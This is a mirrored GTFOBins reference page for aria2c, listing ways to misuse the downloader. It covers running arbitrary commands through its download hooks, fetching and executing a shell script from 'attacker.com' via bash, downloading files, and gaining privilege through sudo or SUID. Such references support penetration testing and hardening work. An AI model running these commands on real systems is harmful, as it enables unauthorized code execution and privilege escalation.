mirror/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 07:49:17 +01:00
Code Issues
e05b154647
GTFOBins.github.io/_gtfobins/aria2c.md
Andrea Cardaci 0417be546e
Simplify aria2c file download
2023-01-07 20:14:40 +01:00

1.2 KiB
Raw Blame History

description functions
Note that the subprocess is immediately sent to the background.
command file-download sudo limited-suid
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF aria2c --on-download-error=$TF http://x
description code
The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID. aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=bash http://attacker.com/aaaaaaaaaaaaaaaa
description code
Fetch a remote file via HTTP GET request. Use `--allow-overwrite` if needed. URL=http://attacker.com/file_to_get LFILE=file_to_save aria2c -o "$LFILE" "$URL"
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF sudo aria2c --on-download-error=$TF http://x
code
COMMAND='id' TF=$(mktemp) echo "$COMMAND" > $TF chmod +x $TF ./aria2c --on-download-error=$TF http://x